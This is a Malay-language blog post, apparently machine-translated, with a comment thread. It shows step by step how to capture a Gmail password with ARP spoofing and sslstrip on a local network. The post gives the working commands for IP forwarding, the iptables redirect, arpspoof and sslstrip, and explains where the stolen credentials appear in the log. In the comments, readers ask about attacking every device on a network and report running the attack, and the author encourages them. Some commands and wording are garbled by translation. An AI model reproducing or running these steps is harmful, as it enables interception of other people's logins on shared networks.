ArpSpoofing dan SSlstrip dalam Tindakan.

Helo Blogger.

Untuk hari ini, saya mempunyai sedikit contoh betapa berbahayanya ia dapat disambungkan di mana-mana rangkaian tanpa keselamatan yang sangat disukai oleh kita.

Untuk hari ini, saya akan menggunakan ArpSpoofing dengan Sslstrip untuk mendapatkan kata laluan Gmail. Untuk menjadikan persekitaran lebih terkawal, saya telah membuat akaun bernama "testarp@gmail.com".

Oleh kerana saya sangat tidak suka mukadimah, mari kita mula berniaga.

Saya tidak bertanggungjawab pada bila-bila masa untuk apa yang mereka dapat lakukan dengan maklumat berikut. Saya melakukannya secara eksklusif untuk tujuan pendidikan

PERSEKITARAN

Untuk ujian ini yang kami ada adalah seperti berikut:

1. Penyerang: Ini adalah komputer desktop atau desktop saya yang mempunyai Debian Wheezy. Dari repositori anda boleh memasang sslstrip y dsniff untuk mempunyai harpspoofing

2. Mangsa: Mangsa adalah Tablet Android yang hanya mahu melihat suratnya melalui penyemak imbas.

3. Medium: Yang tengah adalah milik saya Penghala Cisco DPC2425

ALAMAT.

Alamat penyerang: 172.26.0.2

Alamat Penghala: 172.26.0.1

Alamat Mangsa: 172.26.0.8

SERANGAN:

Untuk memahami lebih sedikit bagaimana serangan itu berfungsi, anda boleh pergi ke yang lama SELEPAS

Perkara pertama yang akan kita lakukan untuk serangan ini adalah dengan mengaktifkan ke depan supaya komputer kita dapat meneruskan maklumat tersebut kepada mangsa tanpa mereka perhatikan. (Jika tidak, ia akan menjadi serangan penolakan perkhidmatan)

Untuk itu kami akan menggunakan:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Setiap arahan di tetingkap konsol langsung.

Sekarang jika kita melakukan ekor -f desdelinux kita melihat maklumat secara langsung dan langsung

gambar1

Jadi bagaimana kita mendapatkan apa yang kita mahukan?

Mari masukkan mel kami terlebih dahulu di Tablet. Semasa log masuk, kami melihat beribu-ribu perkara muncul di konsol kami.

Setelah selesai, mari buka fail kami "desdelinux” dengan nano

nano desdelinux

dengan Control + W kita mencari sesuatu yang dipanggil SECURE POST.

Dan kita akan melihat sesuatu seperti ini.

gambar2

Antara garis besar yang tidak dapat dilihat ialah e-mel dan kata laluan mangsa.

Oleh itu, kami berlari ke kanan sehingga akhirnya kami melihat cahaya di hujung terowong.

gambar3

Pada kesempatan yang lain, kita akan melihat bagaimana kita dapat melindungi diri kita sedikit dari serangan ini.

salam


Tinggalkan komen anda

Alamat email anda tidak akan disiarkan. Ruangan yang diperlukan ditanda dengan *

*

*

  1. Bertanggungjawab atas data: Miguel Ángel Gatón
  2. Tujuan data: Mengendalikan SPAM, pengurusan komen.
  3. Perundangan: Persetujuan anda
  4. Komunikasi data: Data tidak akan disampaikan kepada pihak ketiga kecuali dengan kewajiban hukum.
  5. Penyimpanan data: Pangkalan data yang dihoskan oleh Occentus Networks (EU)
  6. Hak: Pada bila-bila masa anda boleh menghadkan, memulihkan dan menghapus maklumat anda.

  1.   @Jlcmux kata

    Saya mengambil kesempatan ini untuk mengatakan bahawa ketika catatan itu diterbitkan, perintahnya tidak betul.

    Perintah iptables di akhir tidak mempunyai 8080 yang berada di baris lain. Dan kemudian arahan arpspoof semuanya berada pada baris yang sama. Setiap arahan berada pada baris yang berbeza.

    Semoga editor melihatnya dan dapat memperbaikinya.

    Greetings.

    1.    Manual Sumber kata

      Saya telah membuat pembetulan yang anda sebutkan, adakah itu baik?

      Sekiranya anda akan memasukkan kod dalam entri pilihan, gunakan paparan HTML, dan sahkan bahawa artikel itu betul sebelum menghantarnya ke belum selesai. Terima kasih.

  2.   Luis kata

    Sangat menggembirakan apabila mengetahui bahawa kita yang tidak mempunyai pengetahuan sangat terdedah. Maklumat yang sangat baik walaupun saya memahami sedikit subjek saya menyedari kepentingannya. Terima kasih!
    salam

  3.   giskard kata

    Tetapi itu hanya berfungsi jika penyerang dan mangsa berada di rangkaian yang sama. Walau bagaimana pun, menurut saya bahawa jika (berada di rangkaian yang sama) anda menyambung menggunakan HTTPS yang tidak berlaku kerana data dienkripsi SEBELUM meninggalkan mesin anda. Sekiranya anda menyambung dengan HTTP (tanpa S) saya berpendapat bahawa walaupun melihat kabel rangkaian anda akan melihat kuncinya.

    1.    @Jlcmux kata

      Ianya tidak betul. Saya menggodam kata laluan gmail dan jika anda perhatikan gmail menggunakan https. Jadi? Intinya adalah bahawa walaupun https selamat, ia bergantung pada http. Oleh itu, ia tidak begitu selamat.

      Jangan mengaku banyak mengenai https yang S bukan untuk Superman tetapi untuk "selamat"

    2.    Rten kata

      ia berfungsi dengan atau tanpa https, saya telah mencubanya dengan distro linux yang lebih khusus dan ia berfungsi tanpa masalah

    3.    Manual Sumber kata

      Anda boleh menggunakannya dengan tepat untuk memberi pengajaran kepada mereka yang mencuri Wi-Fi anda. 😀

      Kurang lebih seperti apa yang mereka katakan pada masa lalu di blog Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    rayon kata

        Ostia, hebat apa yang dilakukannya! / Dan kemudian mereka memberitahu paranoid saya setiap kali saya menggunakan VPN ketika mereka pergi untuk memeriksa akaun bank…). By the way anda harus melihat bagaimana orang-orang sinis dalam komen ... jika pada akhirnya ia mencuri ...

        1.    eliotime3000 kata

          Sekarang kita perlu mengikuti tutorial bagaimana membuat dan menawarkan perkhidmatan VPN anda sendiri.

      2.    Daniel kata

        Kisah yang anda pautkan sangat menarik, malah sepertinya layak untuk buku novel, dan ini membuat saya teringat ketika saya menggunakan internet jiran-jiran saya dan walaupun saya mengatakan bahawa saya tahu topiknya, saya rasa saya tidak pernah dapat melihat dimensi bahaya yang sebenarnya boleh saya alami terakhir, untungnya saya, mereka hanya menukar kata laluan menjadi WPA2 dan di situlah kisah saya dengan ISP bermula haha

    4.    Mauritius kata

      Itulah sebabnya tajuk itu mengatakan Sslstrip beraksi.

      Ia berfungsi, selagi penyerang berada di tengah

  4.   anon kata

    Apakah gelombang yang anda lakukan pada prisma? -.-
    No.
    Apa tunggu lagi untuk menghantar permintaan anda XD
    berkaitan
    jawatan yang baik

  5.   auroszx kata

    Menariknya, saya akan melakukan ujian pendidikan nanti ... Mungkin saya boleh membuang kata laluan ke WiFi dan bersenang-senang sedikit 😛
    Secara kebetulan, bolehkah anda melakukan sesuatu yang serupa dengan menghantar halaman yang berbeza ke halaman yang diminta oleh sasaran? Contohnya, mereka mahu membuka Facebook dan saya mengarahkannya ke Google? 😛

    1.    @Jlcmux kata

      Ya. Tetapi semuanya adalah gulungan yang sangat berbeza.

      Mungkin saya akan hantar kemudian.

  6.   orang baru terakhir kata

    catatan yang sangat baik, topik-topik ini sangat mendidik, sekarang kita harus dapat mengatasi serangan ini, kerana ada yang (seperti saya) menyambung ke rangkaian awam (misalnya universiti) sangat berguna untuk mengelakkannya.

    Salam!

  7.   hanya-lain-dl-pengguna kata

    Ia tidak berfungsi untuk saya 🙁

  8.   wow kata

    Sesuatu yang gagal saya di sini, selain kenyataan bahawa sambungan https disulitkan melalui sijil pelayan (setelah anda mempunyai sijil pada mesin anda, penyemak imbas anda mengendalikan penyulitan) dengan iptables anda mengalihkan port 80 (http), bukan 443 yang https

    1.    @Jlcmux kata

      Saya fikir begitu juga. Intinya adalah bahawa walaupun https "selamat", sayangnya bergantung pada http. Oleh itu, sslstrip memanfaatkannya, menjadikan penyemak imbas mempercayai bahawa ia menggunakan kelayakan https tetapi tidak.

      1.    wow kata

        tahi suci! tetapi penyemak imbas harus melihat amaran seperti "sijil ini berasal dari laman web yang mencurigakan atau semacamnya" ... Saya pasti akan melakukan ujian XD

        1.    @Jlcmux kata

          Tidak, tidak ada yang keluar.

  9.   hanya-lain-dl-pengguna kata

    Ia akhirnya berjaya untuk saya
    Saya dihubungkan di rangkaian WEP dengan kata laluan, dan itu menunjukkan kata laluan terus kepada saya.

    Pertanyaan. Bolehkah anda melakukan prosedur yang sama tetapi untuk semua komputer yang disambungkan ke rangkaian, bukannya mempunyai satu mangsa?

    1.    @Jlcmux kata

      Ya awak boleh. Tetapi saya belum melakukan eksperimen. Cuba sendiri dan beritahu kami bagaimana kelanjutannya.

  10.   sinnick19 kata

    Satu-satunya perkara yang saya dapat ialah mesin mangsa tidak berfungsi, tetapi sslstrip tidak menunjukkan apa-apa kepada saya: /

    1.    @Jlcmux kata

      Anda harus mematikan firewall sebentar. Atau sekurang-kurangnya aktifkan sambungan masuk.

  11.   Encik Black kata

    Probe dan saya hanya dapat melihat nama pengguna dan kata laluan halaman facebook, di gmail saya tidak menemui hasil dalam log, juga saya hanya memerlukan sebaris arpspoof «arpspoof -i -t«. Sebaliknya, mesin mangsa tidak dapat membuka beberapa halaman. Saya akan terus menyiasat, ia sangat menarik. Bantuan bagi mereka yang menggunakan Manjaro, pakej yang hendak dipasang adalah: dsniff (berikut adalah arpspoff), berpintal dan python2-pyopenssl. Sslstrip boleh dimuat turun dari sini: http://www.thoughtcrime.org/software/sslstrip/
    Untuk menjalankannya $ python2 sslstrip.py
    Greetings.

  12.   Encik Black kata

    Itu tidak keluar tetapi garis arpspoof adalah: #arpspoof -i int -t ip-mangsa ip-router

  13.   gilbert kata

    Lihatlah saya melakukan apa yang anda katakan:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    masalahnya adalah bahawa mangsa yang merupakan komputer lain yang saya ada di sini di bilik saya, saya tidak mempunyai hubungan dengan titik bahawa saya harus menghidupkan semula penghala, apa yang boleh saya bantu saya.

    Perkara lain, saya bekerja dengan mesin maya, dan ketika saya menjalankan perintah iwconfig, wlan0 tidak muncul, atau ketika saya menjalankan ifconfig, bagaimanapun, jika saya mempunyai internet di mesin maya saya, bagaimana dengan antara muka eth0.